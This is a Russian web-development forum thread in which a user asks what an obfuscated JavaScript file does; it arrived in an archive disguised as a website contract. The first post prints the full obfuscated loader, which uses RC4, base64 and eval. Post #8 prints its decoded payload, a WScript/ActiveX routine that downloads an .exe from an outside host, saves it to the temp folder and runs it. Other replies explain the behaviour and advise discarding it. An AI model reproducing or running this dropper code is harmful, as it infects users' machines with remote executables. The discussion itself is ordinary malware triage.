Форум Сайтостроение Веб-строительство

Что делает этот код? Не вирус?

12
S3
На сайте с 29.03.2012
Offline
367
Sly32
1312

Прислали под видом договора для сайта. Архив. А в нем JS файлы. Открыл в редакторе. Что может делать эта хрень? 




function rc4(key, str) {

	var s = [], j = 0, x, res = '';

	for (var i = 0; i < 256; i++) {

		s = i;

	}

	if (key == 'tt'){

		return 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

	}

	for (i = 0; i < 256; i++) {

		j = (j + s + key.charCodeAt(i % key.length)) % 256;

		x = s;

		s = s[j];

		s[j] = x;

	}

	if (key == 'ttt'){

		return 'abcdefghijklmnopqrstuvwxyz0123456789';

	}

	i = 0;

	j = 0;

	for (var y = 0; y < str.length; y++) {

		i = (i + 1) % 256;

		j = (j + s) % 256;

		x = s;

		s = s[j];

		s[j] = x;

		res += String.fromCharCode(str.charCodeAt(y) ^ s[(s + s[j]) % 256]);

	}

	return res;

}

function awupi( ezowenux ) {

	var fn = rc4('tt','test');

	fn = fn + rc4('ttt','gasdgas');

	var beb = fn+'+'+'/'+'=';

	var awu, zaf, age, doj, obo, uce, kyv, isozu, o=0, tyz='';

	do {

		doj = beb.indexOf(ezowenux.charAt(o++));

		obo = beb.indexOf(ezowenux.charAt(o++));

		uce = beb.indexOf(ezowenux.charAt(o++));

		this['eval']('kyv = beb.indexOf(ezowenux.charAt(o++));');

		this['eval']('isozu = doj<<18 | obo<<12 | uce<<6 | kyv;');

		awu = isozu>>16 & 0xff;

		zaf = isozu>>8 & 0xff;

		age = isozu & 0xff;

		if (uce == 64)	  tyz += String.fromCharCode(awu);

		else if (kyv == 64) tyz += String.fromCharCode(awu, zaf);

		else			   tyz += String.fromCharCode(awu, zaf, age);

	} while (o < ezowenux.length);

	return tyz;

}function t15fazipagewe(){  return awupi('YQ==');};function t25fazipagewe(){  return awupi('YQ==');};function t4fazipagewe(){  return awupi('ag==');};function t24fazipagewe(){  return awupi('ag==');};function t10fazipagewe(){  return awupi('ZA==');};function t29fazipagewe(){  return awupi('YQ==');};function t0fazipagewe(){  return awupi('Zg==');};function t1fazipagewe(){  return awupi('YQ==');};function t14fazipagewe(){  return awupi('bA==');};function t28fazipagewe(){  return awupi('ag==');};function t19fazipagewe(){  return awupi('ag==');};function t13fazipagewe(){  return awupi('YQ==');};function t8fazipagewe(){  return awupi('ag==');};function t21fazipagewe(){  return awupi('bA==');};function t3fazipagewe(){  return awupi('cw==');};function t6fazipagewe(){  return awupi('bA==');};function t27fazipagewe(){  return awupi('Zw==');};function t12fazipagewe(){  return awupi('dg==');};function t2fazipagewe(){  return awupi('bA==');};function t16fazipagewe(){  return awupi('bA==');};function t17fazipagewe(){  return awupi('ZA==');};function t22fazipagewe(){  return awupi('ZA==');};function t23fazipagewe(){  return awupi('Zw==');};function t26fazipagewe(){  return awupi('bA==');};function t20fazipagewe(){  return awupi('YQ==');};function t9fazipagewe(){  return awupi('cw==');};function t5fazipagewe(){  return awupi('Zw==');};function t7fazipagewe(){  return awupi('YQ==');};function t11fazipagewe(){  return awupi('ZQ==');};function t18fazipagewe(){  return awupi('Zw==');};var ds=''; var dss=''; var ubeb=''; for (var poxow=0; poxow<=29; poxow++) { ubeb += this['t'+poxow+'fazipagewe'](); } ds = ubeb.replace('falsjglajsd',''); dss = ds.replace('aldgjaldgjalgja',''); ubeb=''; ubeb=dss;var ixax; ixax=awupi('860pztNmsGSSQhaf3mKP3RGuD9BYmETSRG/8LG1eJzvE/YzCweVTytzxdHpGxZYNlz0EoEZjF55T+6ZttJmlZOTGMrzq3MWDHhVdhnDdSM5ngvwvu1Pxf1CiGmSnLMTzqWyCdPqn5aC99kaV0NgIJmu1VkfrXLI7buwZ4AJV1ETHRF59Snx3IjXw77v76rXXtLqPidlVmGJZDXt/TQjdFG1jwk65nnchIJWLCSBLWDaydiTXjbn4t5g6R43OL9DJz1DoNDAXK0TtbmO4AqHjUqrD/S0Ris91XpKxvofnTjxAFSGSVIi9HxQ+DYp7YL+orchAxZ2FfUKvny6/TCSaSC47jiKjF5FG55CEj6ElEJz2kN7qsuak/0mEjaBM1b2J1XqsKHC17nnmAZ5Wv3Kdyyd/mgfO8wjmywuR4qtbStNdV1xdicIesoeUnsomoidueG1jEeC0aQ8CjKoZm9O5JadWi+SVDxPM4EvOPJwi+P1MD3ULRy76wDY4yBQLHdKh8uSdHLn8e3SWtS+dfOo4JHJL6KaZbG/Ya1ftRf/yWXzPHyMHpQBpTQvibtu3zdUcevn31+WsrxLc3r6YDzi54p/L4vK5qez+E2Dnx4AWnKIqGZnkXuCVSgPB3KkQCtgqnxuwu02GCa8P7SNAhqE2cPYEs4yGuyOdDvreS1lfdFKiiqI1CIClEDBg9yFT1YFIlD5WSLPLXDsJMA+ffFM9IHedEPqmmbGL+VTh9a2H8+5IYfnuDjh+EAlwEtkW3onhF6qOp1IzzOAwOk74slZlhQRhf7ycrPyZoU9dPrY9tvNYL5dcbyOyVxhl24rfcVuU2lBlAx5UALct3b+gu7gk3SQS4o/kp78nOTbGuppOrmYyQSgcULQGtOIFTWc70VWwl91j/wxYxTmTvv47zr/m24XWDv9lYm3pA7x0ZSN7XauC+0elaJOMkqD5u1Hq691nWFpIGbTCm7zIem6SUQR3t6R+'); this[ubeb](rc4('fdasgasg',ixax));
K
На сайте с 03.06.2015
Offline
45
kostyanet
#1

В смысле прислали зашифрованный исходник вируса? Оч.интересно, с учетом того факта, что 99,9 процентов пользователей винды или любой другой ОС в упор не знают что js файлы можно запускать как exe.

MYSQL PHP JS HTML CSS SEO TXT США СССР
ESET NOD32 обман с iframe.in сдох :( Внимание Мошенник по обмену
LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#2

в спам добавить и забыть.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
S3
На сайте с 29.03.2012
Offline
367
Sly32
#3
LEOnidUKG:
в спам добавить и забыть.

Собственно я так и сделал, просто любопытно, что это такое. спам был прислан с названием - "Договор для {{имя домена}}" , имя настоящее.

Сам разобраться не могу что код делает. Чисто для практики

K
На сайте с 03.06.2015
Offline
45
kostyanet
#4

Этот код ничего не делает кроме того, что дешифрует другой код. Какой там код - надо запускать, дешифровать бактерию и все такое. Нафик надо.

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#5
Sly32:
Не вирус?

Пытался посмотреть топик на винде - антивирь (АВГ ИС) его тут же локнул :) Полностью страницу.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
S3
На сайте с 29.03.2012
Offline
367
Sly32
#6
SeVlad:
Пытался посмотреть топик на винде - антивирь (АВГ ИС) его тут же локнул :) Полностью страницу.

Я винду только для танчиков загружаю и для банка))) там бы даже не рискнул бы)

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#7
Sly32:
Я винду только для танчиков загружаю и для банка))) там бы даже не рискнул бы)

Я просто неск дней был далек от своего компа и на сёрч заходил гостем с чужого ПК :)

siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#8 


function dl(fr, url, ext) {

    var ws = new ActiveXObject("WScript.Shell");

    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ext;

    var dn = 0;

    var xo = new ActiveXObject("MSXML2.XMLHTTP");

    xo.onreadystatechange = function() {

        if (xo.readyState == 4 && xo.status == 200) {

            var xa = new ActiveXObject("ADODB.Stream");

            xa.open();

            xa.type = 1;

            xa.write(xo.ResponseBody);

            if (xa.size > 0) {

                dn = 1;

                xa.position = 0;

                xa.saveToFile(fn, 2);

                try {

                    ws.Run(fn, 1, 1);

                    //ws.Run("http://mail.ru/",1,1);

                } catch (er) {};

            };

            xa.close();

        };

    };

    try {

        xo.open("GET", url, false);

        xo.send();

    } catch (er) {};

};

dl('-', 'http://ilyushchenko19771.7ci.ru/logo.png', '.exe');
RiDDi
На сайте с 06.06.2010
Offline
285
RiDDi
#9

скачивает, сохраняет и запускает стороннее приложение

Вебмастер отдыхает на бережках морей. Заработок в интернете - дело техники.
SocFishing
На сайте с 26.09.2013
Offline
118
SocFishing
#10

Вот что не так давно было написано: http://www.securitylab.ru/news/473924.php

В JS можно закодировать бинарник и при запуске распаковать.

★Сервис идентифицирует (https://socfishing.com/?utm_source=searchengines) посетителей вашего сайта и предоставляет их профили ВКонтакте, Телефон, Почта! Цены копеечные, работаем 8 лет.
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий